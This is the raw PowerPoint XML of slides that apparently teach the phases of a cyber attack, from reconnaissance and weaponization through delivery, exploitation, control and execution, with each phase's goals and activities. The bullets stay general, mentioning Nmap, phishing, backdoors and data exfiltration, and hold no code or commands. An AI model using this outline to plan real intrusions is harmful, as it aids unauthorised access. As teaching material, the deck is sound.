            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PHASE 1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="TextBox 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6069C439-2F97-2477-9484-31818982770D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1800251" y="4547506"/>
            <a:ext cx="1932388" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PHASE 2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="TextBox 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{644E47F1-872A-1D8C-D7F8-683E88434B5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2939301" y="2398356"/>
            <a:ext cx="1965494" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PHASE 3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="TextBox 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3508C597-43DA-2928-8937-70EF1F7B53D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4409485" y="4547506"/>
            <a:ext cx="1758534" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PHASE 4</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="TextBox 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB21B118-8912-F32E-969A-0E36034CD0AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5711782" y="2390984"/>
            <a:ext cx="1965493" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PHASE 5</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Oval 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBAE5974-6DDC-153B-4796-89AE188238A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="8087761" y="3662474"/>
            <a:ext cx="261716" cy="261716"/>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35" name="TextBox 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB2B27AC-1453-736D-EDF1-806275FDA329}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7292734" y="4047159"/>
            <a:ext cx="1758534" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="TextBox 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E43AD90E-92BE-E287-0294-3C72C14FB243}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7292734" y="4547506"/>
            <a:ext cx="1758534" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PHASE 6</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Oval 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4113B42F-9ED0-FA75-59EA-0C705E2C1B4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9552854" y="3642861"/>
            <a:ext cx="261716" cy="261716"/>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43" name="TextBox 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3B1FC87-ADA7-5653-3F20-2464C9533A00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8675734" y="3151555"/>
            <a:ext cx="2015957" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Maintain Access</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="TextBox 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC8F961B-6762-A3A7-81C8-F1B4AC69C267}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8700967" y="2398533"/>
            <a:ext cx="1965493" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PHASE 7</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94130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74837-B0FC-C5CF-4245-7FEF5FCA73EB}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44" descr="Why Businesses Need Ethical Hackers | Certified Ethical Hacking">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14ED8230-E122-86FA-C866-F6F5B0E0432C}"/>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199EE21A-DB59-4325-CE0B-B0C99287E526}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402262" y="861328"/>
            <a:ext cx="11387475" cy="30162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l">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="32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RECONNAISSANCE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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Goal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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Gather information about the target.</a:t>
            </a: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Activities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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742950" lvl="1" indent="-285750">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2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Identify potential entry points (e.g., open ports, services).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2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Collect data like employee names, email addresses, and IP ranges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2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Use tools like Nmap, OSINT, and social engineering.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1031" name="Picture 7" descr="How Passive Information Gathering can save your time during Pentesting | by  Anurag Tiwari | System Weakness">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB2A36FA-16E6-924B-2259-511B3DABE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4650" y="3019961"/>
            <a:ext cx="3839527"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037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89AAA-8E25-3F6F-ADDE-13E553EA1796}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44" descr="Why Businesses Need Ethical Hackers | Certified Ethical Hacking">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC5D3A31-2195-14B3-3258-1334E0D7F74B}"/>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0B9ED743-FDF8-C68D-4CC8-8532369AFD11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402262" y="861328"/>
            <a:ext cx="11387475" cy="30162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l">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="32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WEAPONIZATION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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Goal</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Create tools or payloads to exploit the target.</a:t>
            </a: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Activities</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Develop malicious code (e.g., malware, phishing emails).</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Package exploits with delivery mechanisms (e.g., macros, scripts).</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Test the payload to ensure effectiveness.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2058" name="Picture 10" descr="Data, copy, cyber, crime, virus, malware, bug 3D illustration - Download on  Iconfinder">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E40091F-8531-14D9-FDC0-580F4F0B1D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8402" y="3203637"/>
            <a:ext cx="2793035" cy="279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668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F3594-CAA3-D1F0-405E-F5A8AF196A1A}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44" descr="Why Businesses Need Ethical Hackers | Certified Ethical Hacking">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{425E6D3F-DAF5-DCD9-71A0-3ED87473BFB8}"/>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8F0DCB12-216D-8642-958A-0ABA71A065E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402262" y="861328"/>
            <a:ext cx="11387475" cy="30162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l">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="32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DELIVERY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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Goal</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Send the malicious payload to the target.</a:t>
            </a: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Activities</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Use phishing emails, malicious links, or USB devices.</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Exploit web applications or vulnerabilities for initial access.</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Ensure the payload reaches the target without being detected.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="Phishing Email PNG, Vector, PSD, and Clipart With Transparent Background  for Free Download | Pngtree">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78F03558-6F4F-2939-9DD2-ACFAA9B6EE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6713" y="3217903"/>
            <a:ext cx="3529013" cy="316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62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46B02-8EDF-3FFE-E5D0-36487B767C84}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44" descr="Why Businesses Need Ethical Hackers | Certified Ethical Hacking">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98455D57-6D90-6417-F82D-468730F4CC24}"/>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852E0D-21D3-A638-439C-1759937D2758}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402262" y="861328"/>
            <a:ext cx="11387475" cy="30162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l">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="32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EXPLOITATION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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Goal</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Trigger the payload to exploit vulnerabilities in the target system.</a:t>
            </a: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Activities</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Execute malicious scripts or commands.</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Exploit software, operating system, or human weaknesses.</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Bypass security measures (e.g., firewalls, antivirus).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2052" name="Picture 4" descr="Cyber Attack PNG, Vector, PSD, and Clipart With Transparent Background for  Free Download | Pngtree">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD0CD12F-3848-3E22-537E-C2F07744F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3224" y="3204731"/>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651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28362-87FC-1B04-0A9B-9AF32D69D0D3}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44" descr="Why Businesses Need Ethical Hackers | Certified Ethical Hacking">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F841A19-36FA-26F4-0C8D-AB09467C0430}"/>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89A51A14-0CA8-A12F-4E9B-E57E964256BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402262" y="861328"/>
            <a:ext cx="11387475" cy="30162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l">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="32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CONTROL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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Goal</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Establish control over the compromised system.</a:t>
            </a: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Activities</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Deploy remote access tools or backdoors.</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Secure persistent access to the system.</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Avoid detection by using stealth techniques.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="Cybersecurity Theme, Digital Security, Data Protection PNG Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8053222-3C74-1D49-A39D-AECEE8F22E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8051" y="3698340"/>
            <a:ext cx="4317374" cy="258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13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1028-1653-FDD1-AC02-3B3EACF41737}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44" descr="Why Businesses Need Ethical Hackers | Certified Ethical Hacking">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C0F5329-FCDB-68F1-753C-FD016A8910CA}"/>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13579BD-EB61-A75E-75F4-0392A171CCA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402262" y="861328"/>
            <a:ext cx="11387475" cy="30162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l">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="32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EXECUTION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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Goal</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Carry out the intended malicious actions.</a:t>
            </a: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Activities</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Exfiltrate data (e.g., sensitive files, credentials).</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Spread malware across the network.</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Disrupt services or destroy data (if part of the objective).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="What is Data Exfiltration and How Can You Prevent It? | BlackFog">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{003F63A7-CFDF-8434-ED24-CE7114631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9406" y="3283580"/>
            <a:ext cx="2673113" cy="29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98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9DE35-A87B-7F51-852E-17B93AD5288B}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
